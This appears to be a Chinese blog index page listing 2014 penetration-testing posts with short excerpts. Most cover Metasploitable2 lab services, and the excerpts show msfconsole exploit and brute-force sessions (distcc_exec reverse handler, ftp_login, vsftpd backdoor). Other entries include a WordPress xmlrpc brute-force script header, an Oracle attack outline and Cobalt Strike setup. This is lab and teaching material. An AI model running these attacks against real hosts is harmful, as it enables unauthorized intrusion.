- 博客(27)
- 资源 (1)
- 收藏
- 关注
原创 Metasploitable2 - tcp port 5432 - postgres
msf auxiliary(postgres_readfile) > show options Module options (auxiliary/admin/postgres/postgres_readfile): Name Current Setting Required Description ---- --------------- -
2014-07-31 23:51:09 1181
原创 Metasploitable2 - tcp port 3632 - distccd
msf exploit(distcc_exec) > set RHOST 192.168.1.111RHOST => 192.168.1.111msf exploit(distcc_exec) > run[*] Started reverse double handler[*] Accepted the first client connection...[*] Accep
2014-07-31 23:44:12 918
原创 Metasploitable2 - tcp port 3306 - mysql
msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- ---------------
2014-07-31 23:42:13 1924
原创 Metasploitable2 - tcp port 2121 - Proftp
msf > use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > set USERNAME msfadminUSERNAME => msfadminmsf auxiliary(ftp_login) > set PASSWORD msfadminPASSWORD => msfadminmsf auxiliar
2014-07-31 23:26:24 2353
原创 Metasploitable2 - tcp port 2049 - NFS
nfs 2049/tcp #Network File System - Sun Microsystemsshilp 2049/tcp #nfs 2049/udp #Network File System - Sun Microsystemsshilp 2049/udp #nfs --
2014-07-31 22:46:30 1704
原创 Metasploit2 - tcp port 1099 - RMI
Java 远程方法调用(Remote Method Invocation, RMI)使得运行在一个 Java 虚拟机(Java Virtual Machine, JVM)的对象可以调用运行另一个 JVM 之上的其他对象的方法,从而提供了程序间进行远程通讯的途径。RMI 是 J2EE 的很多分布式技术的基础。推荐阅读: http://www.blogjava.net/boddi/archive/20
2014-07-31 22:06:56 934
原创 Metasploit2: tcp port 139/445 – Samba smbd
Metasploit2: tcpport 139 – netbios-ssnWindows系统开启139端口,可用工具psshutdown.exe远程关闭电脑.Samba可运行在MicrosoftWindows外的系统,例如:UNIX, Linux, IBM System, OpenVMS和其他的系统.Samba使用的是TCP/IP协议.它允许主机与Windows客户端
2014-07-30 00:15:56 5019
原创 Metasploit2: tcp port 111 – rpcbind
Metasploit2: tcpport 111 – rpcbindRPC& portmapper (111 TCP + other UDP)portmapper服务是这样工作的:当我连接portmapper端口时,表明我想使用一个指定的RPC服务。portmapper会告诉我该使用哪个端口.(RPC是RemoteProcedure Call的简称,类似与执行远程主机上
2014-07-29 23:38:32 8512
原创 Metasploit2 - tcp port 21 - vsftpd
Metasploitable2: tcp port 21 - vsftpdMetasploitable2的21号端口,运行的是vsftp服务。该版本的源码被攻击者植入了后门。后门很快被移除,但是还是有部分人下载了它。如果登录的用户名结尾是“:)”[笑脸],那么在6200端口会监听一个后门.msf> use exploit/unix/ftp/vsftpd_234_ba
2014-07-29 23:36:32 1340
原创 ssh cheat sheet
SSH 速查表SSH有些特性在渗透和审计过程中很实用。该文章的目的就是,提醒我们记住最常用的特性。注意:此文章并不能取代官网的手册页面,只是为了介绍一些SSH相关的例子。SOCKS Proxy本地(127.0.0.1:1080)开一个socks代理,通过代理可以将数据中转到远程主机(192.168.1.11
2014-07-28 00:52:08 923
原创 nmap -- [ip-geolocation-maxmind]
插件ip-location-maxmind,可以帮助nmap获取ip的geo信息。官方说明:http://nmap.org/nsedoc/scripts/ip-geolocation-maxmind.html数据库:http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.g
2014-07-27 16:43:56 1151
原创 SecOS Chanllenge
http://resources.infosecinstitute.com/secos-challenge/#comment-1182247
2014-07-27 01:28:32 1207
原创 xmlrpc.php brute attack
#!/usr/bin/env python# -*- coding: utf8 -*-import sysimport httplibfrom urllib2 import urlopen, HTTPError, URLErrorfrom xml.dom.minidom import parseStringfrom xml.parsers.expat import ExpatErr
2014-07-24 01:08:06 1238
转载 Extracting Metada From Files
root@gnu:~# exiftool 123.doc ExifTool Version Number : 8.60File Name : 123.docDirectory : .File Size : 131 kBFile Mo
2014-07-21 16:43:46 1281
原创 Oracle Attack Methodology
Oracle Attack Methodology1. Locate Oracle Version2. Determine Oracle Version3. Determine Oracle SID4. Guess/Bruteforce USER/PASS5. Privilege Escalation via SQL Injection6. Manipulate Data/
2014-07-21 15:45:53 1040
原创 Install Cobalt Strike on Kali Linux
Install Cobalt Strike on Kali LinuxDependenciesKali Linux ships with the dependencies needed to use Cobalt Strike. The Metasploit Framework and Java are already setup for you.Installation Steps
2014-07-21 12:24:40 2937
原创 HTTP(S) directory/file brute forcer
root@gnu:~# dirs3arch -u http://www.example.com/ -e php -w /usr/share/dirs3arch/db/dirbuster/directory-list-2.3-small.txt -l -r -t 10 --user-agent "Mozilla" --no-follow-redirects -o example.txt
2014-07-20 21:45:22 762
原创 dnsrecon 侦察
http://pentestlab.wordpress.com/tag/dnsrecon/Standard Record Enumeration
2014-07-19 23:12:14 4115
原创 metasploit + openvas
root@gnu:~# openvas-start Starting OpenVas ServicesStarting Greenbone Security Assistant: gsad.Starting OpenVAS Scanner: openvassd.Starting OpenVAS Administrator: openvasad.Starting OpenVAS
2014-07-18 23:32:03 1970
原创 python -- PyMongo
PyMongo 是Python的发行版本,它包含一些工具,强烈推荐用于协同MongoDB进行工作。这>个文档将会介绍一些使用PyMongo时需要知道的内容。安装/更新介绍如何获取发行版本教程快速介绍案例介绍如何完成指定任务常见的问题解答一些常常遇到的问题Python3 的疑问关于支持Python3被经常提及的问题API文档
2014-07-08 07:35:41 1671
转载 python -- Python 标准库
Python 标准库1. Introduction2. Built-in Functions3. Non-essential Built-in Functions4. Built-in Constants4.1. Constants added by thesite module5. Built-in Types5.1. Truth Value Test
2014-07-04 00:46:09 1301
原创 python -- 文件对象方法
本节中的示例都默认文件对象 f 已经创建。要读取文件内容,需要调用 f.read(size) ,该方法读取若干数量的数据并以字符串形式返回其内容,size 是可选的数值,指定字符串长度。如果没有指定 size 或者指定为负数,就会读取并返回整个文件。当文件大小为当前机器内存两倍时,就会产生问题。反之,会尽可能按比较大的size 读取和返回数据。如果到了文件末尾,f.read() 会返回
2014-07-03 12:32:20 799
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人